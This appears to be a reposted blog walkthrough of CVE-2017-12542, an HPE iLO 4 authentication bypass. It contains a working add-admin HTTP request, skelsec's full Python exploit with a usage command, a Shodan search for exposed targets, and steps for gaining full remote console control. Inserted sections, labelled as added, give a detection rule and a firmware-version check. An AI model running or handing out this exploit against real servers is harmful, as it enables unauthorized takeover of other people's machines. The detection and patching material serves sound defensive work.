2025-01-28 Update From: SLTechnology News&Howtos (shulou)
Shulou (Shulou.com) 05/31 Report
This article walks through a short analysis and reproduction of CVE-2017-12542. The steps are described in some detail, so readers who manage HPE servers can use it for reference.
Brief introduction
CVE-2017-12542 is a critical vulnerability with a CVSS score of 9.8: the conditions for exploiting it are simple and the impact is severe. For nearly a decade, iLO has been the server management solution embedded in almost all HP servers. It gives system administrators the functions they need for remote management, including power management, a remote system console, remote CD/DVD image mounting and so on. A vulnerability in HPE Integrated Lights-Out 4 (iLO 4) may allow a remote unauthenticated attacker to bypass authentication and execute arbitrary code.
Brief analysis
The iLO login interface normally looks like the following figure:
When https://127.0.0.1:8443/rest/v1/AccountService/Accounts is requested without credentials, HTTP/1.1 401 Unauthorized is returned:
After setting the Connection header of the HTTP request to a value of 29 or more characters, authentication is bypassed (the following figure shows the iLO login user names of the target being retrieved successfully):
Sending an add-user POST request to the target, again with the Connection header set to 29 A's, creates the user successfully:
POST /rest/v1/AccountService/Accounts HTTP/1.1
Host: 127.0.0.1:8443
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json

{"UserName": "administratar", "Password": "admin@123", "Oem": {"Hp": {"Privileges": {"RemoteConsolePriv": true, "iLOConfigPriv": true, "VirtualMediaPriv": true, "UserConfigPriv": true, "VirtualPowerAndResetPriv": true, "LoginPriv": true}, "LoginName": "administratar"}}}
The added user can log in successfully and has full control rights:
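A defender's view of the same behaviour: the bypass described above leaves a distinctive mark in traffic, because no browser or management client sends a Connection header 29 characters long, and a legitimate account write to the REST interface always carries credentials. The following detection rule is an added example, not code from the original article or from skelsec's PoC; the HTTP requests it runs over are constructed samples, and the threshold of 29 characters is the one the page names.

```python
"""Detection rule for the CVE-2017-12542 authentication-bypass trigger.

Added example, not part of the original article or of skelsec's PoC.
It flags requests to the iLO 4 REST interface whose Connection header is
29 or more characters long, and account writes that arrive without any
credentials. The requests below are constructed samples, not captures.
"""

# Length named on the page; no legitimate Connection token is this long.
MIN_SUSPICIOUS_CONNECTION_LEN = 29
ACCOUNT_PATH_PREFIX = "/rest/v1/AccountService"


def parse_request_head(raw):
    """Split a raw HTTP request head into (method, path, headers).

    Header names are lower-cased so lookups are case-insensitive; the body,
    if any, is ignored because the rule only needs the header block.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify_request(raw):
    """Return a list of findings for one request; an empty list means benign."""
    method, path, headers = parse_request_head(raw)
    findings = []
    connection = headers.get("connection", "")
    if len(connection) >= MIN_SUSPICIOUS_CONNECTION_LEN:
        findings.append(
            "oversized Connection header (%d chars): CVE-2017-12542 bypass pattern"
            % len(connection)
        )
    has_credentials = "authorization" in headers or "cookie" in headers
    if method == "POST" and path.startswith(ACCOUNT_PATH_PREFIX) and not has_credentials:
        findings.append("account write to %s without any credentials" % path)
    return findings


def scan(request_heads):
    """Run the rule over many request heads; return [(index, findings)] for hits."""
    hits = []
    for index, raw in enumerate(request_heads):
        findings = classify_request(raw)
        if findings:
            hits.append((index, findings))
    return hits


# Constructed sample: an ordinary authenticated listing of accounts.
BENIGN_REQUEST = (
    "GET /rest/v1/AccountService/Accounts HTTP/1.1\r\n"
    "Host: 127.0.0.1:8443\r\n"
    "Connection: keep-alive\r\n"
    "Authorization: Basic PLACEHOLDER\r\n"
    "\r\n"
)

# Constructed sample shaped like the add-user request shown on the page.
BYPASS_REQUEST = (
    "POST /rest/v1/AccountService/Accounts HTTP/1.1\r\n"
    "Host: 127.0.0.1:8443\r\n"
    "Accept: */*\r\n"
    "Connection: " + "A" * 29 + "\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"UserName": "administratar", "Password": "admin@123"}'
)

if __name__ == "__main__":
    for index, findings in scan([BENIGN_REQUEST, BYPASS_REQUEST]):
        print("request %d:" % index)
        for finding in findings:
            print("  -", finding)
```

The rule is deliberately narrow: a single oversized Connection header is already a high-confidence indicator on its own, and the second check catches account creation attempts even if the trigger length were to vary, so the two findings together give an analyst both the "how" and the "what" of an attempt.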
Reproduction and exploitation
On Shodan, a search for the keyword HP-iLO-Server returns about 8800 results, mainly in the United States, Hong Kong, the United Kingdom and so on.
skelsec's PoC can be used to check whether a target is affected:
#!/usr/bin/env python
"""
Exploit trigger was presented @ reconbrx 2018
Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html
Original advisory from HP: https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us
Other advisories for this CVE:
https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
https://securitytracker.com/id/1039222
http://www.exploit-db.com/exploits/44005
https://packetstormsecurity.com/files/146303/HPE-iLO4-Add-New-Administrator-User.html
https://vulndb.cyberriskanalytics.com/164082

IMPORTANT: THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542
thanks to the two other vulns are critical as well But only triggerable on the host itself.
"""
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import json
import urllib3

# All of the HP iLO interfaces run on HTTPS, but most of them use a self-signed SSL cert.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# The 29-character Connection header is the authentication-bypass trigger.
exploit_trigger = {'Connection': 'A' * 29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'


def test(ip):
    # Lists the accounts; a JSON answer means the bypass worked.
    url = accounts_url % ip
    try:
        response = requests.get(url, headers=exploit_trigger, verify=False)
    except Exception as e:
        return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
    try:
        data = json.loads(response.text)
    except Exception as e:
        return False, 'Target response not as qualified, Exception data: %s' % (str(e),)
    return True, data


def exploit(ip, username, password):
    # Creates a new account with every privilege set.
    Oem = {
        'Hp': {
            'LoginName': username,
            'Privileges': {
                'LoginPriv': True,
                'RemoteConsolePriv': True,
                'UserConfigPriv': True,
                'VirtualMediaPriv': True,
                'iLOConfigPriv': True,
                'VirtualPowerAndResetPriv': True,
            },
        }
    }
    body = {'UserName': username, 'Password': password, 'Oem': Oem}
    url = accounts_url % ip
    try:
        response = requests.post(url, json=body, headers=exploit_trigger, verify=False)
    except Exception as e:
        return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
    if response.status_code in [requests.codes.ok, requests.codes.created]:
        return True, response.text
    else:
        return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)


if __name__ == '__main__':
    import argparse
    import sys

    parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
    parser.add_argument('ip', help='target IP')
    parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
    parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
    parser.add_argument('-u', help='username of the new admin user')
    parser.add_argument('-p', help='password of the new admin user')
    args = parser.parse_args()

    if args.e:
        if args.u is None or args.p is None:
            print('Username and password must be set for exploiting')
            sys.exit()
        res, data = exploit(args.ip, args.u, args.p)
        if res:
            print('[+] Successfully added username')
        else:
            print('[-] Error! %s' % data)
    elif args.t:
        res, data = test(args.ip)
        if res:
            print('[+] Target is VULNERABLE')
            for i in data['Items']:
                print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
        else:
            print('[-] Error! %s' % data)
The usage is as follows:
python hp_iLO_4_exp-CVE-2017-12542.py -e -u administratar -p admin@123 ip:port
This adds a user with the username administratar and the password admin@123:
With HP's iLO Integrated Remote Console (download address: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8) you can connect to the target remotely. There are two ways to connect:
1. Open HP iLO Integrated Remote Console and fill in the connection details in the prompt that appears.
2. On the home page, click Java Web Start under Information > Overview to download a .jnlp file; opening it connects automatically.
Once connected, you have complete control of the target:
Vulnerability fix
Hewlett-Packard has fixed this vulnerability in newer firmware (version 2.53 or later), so upgrading the iLO firmware resolves it. The firmware and the advisory are available from the following addresses: http://www.hpe.com/support/ilo4 and https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us
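Knowing that 2.53 is the fixed version is only useful if you can tell which of your iLOs are still below it. The following inventory check is an added example and not part of the original article. It assumes, which the page does not state, that an iLO reports its product name and firmware revision without authentication at /xmldata?item=All in the RIMP/MP/PN and RIMP/MP/FWRI elements; the XML embedded below is a constructed sample in that shape, and the fixed version 2.53 is the one the article gives.

```python
"""Firmware-version check for CVE-2017-12542 remediation tracking.

Added example, not part of the original article. Assumes (the page does not
mention this) that an iLO exposes RIMP/MP/PN and RIMP/MP/FWRI at
/xmldata?item=All without authentication; SAMPLE_XMLDATA is a constructed
document in that shape. The fixed version, 2.53, is the one the article gives.
"""
from decimal import Decimal, InvalidOperation
import xml.etree.ElementTree as ET

# iLO 4 firmware 2.53 is the first release containing the fix, per the article.
FIXED_VERSION = Decimal("2.53")

# Constructed sample, shaped like an iLO 4 /xmldata?item=All response.
SAMPLE_XMLDATA = """<?xml version="1.0"?>
<RIMP>
  <HSI>
    <SBSN>CONSTRUCTED-SERIAL</SBSN>
    <SPN>ProLiant DL380 Gen9</SPN>
  </HSI>
  <MP>
    <ST>1</ST>
    <PN>Integrated Lights-Out 4 (iLO 4)</PN>
    <FWRI>2.50</FWRI>
    <HWRI>ASIC: 16</HWRI>
    <SN>ILOCONSTRUCTED</SN>
  </MP>
</RIMP>
"""


def parse_xmldata(xml_text):
    """Return (product_name, firmware_version_string) from an xmldata document."""
    root = ET.fromstring(xml_text)
    product = root.findtext("./MP/PN", default="").strip()
    firmware = root.findtext("./MP/FWRI", default="").strip()
    return product, firmware


def assess_firmware(xml_text):
    """Decide whether an iLO is still exposed to CVE-2017-12542.

    Returns a dict with the product, the firmware string and a 'status' of
    'vulnerable', 'fixed', 'not-ilo4' or 'unknown'. Firmware strings are
    compared as decimals, so 2.50 < 2.53 <= 2.55, which matches how iLO 4
    releases are numbered; an unparsable string is reported, not guessed at.
    """
    product, firmware = parse_xmldata(xml_text)
    result = {"product": product, "firmware": firmware}
    if "iLO 4" not in product:
        # The fix version applies to iLO 4 only; other generations need
        # their own advisory lookup.
        result["status"] = "not-ilo4"
        return result
    try:
        version = Decimal(firmware)
    except InvalidOperation:
        result["status"] = "unknown"
        return result
    result["status"] = "vulnerable" if version < FIXED_VERSION else "fixed"
    return result


if __name__ == "__main__":
    print(assess_firmware(SAMPLE_XMLDATA))
```

In practice the XML would be fetched over HTTPS from each management address in your inventory (most iLOs present self-signed certificates, so pin or import them rather than disabling verification) and the 'vulnerable' results become the upgrade list; the check itself stays read-only and needs no credentials.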
This concludes the short analysis and reproduction of CVE-2017-12542. I hope the content above is helpful and that you have learned something from it. If you found the article useful, please share it so that more people can read it.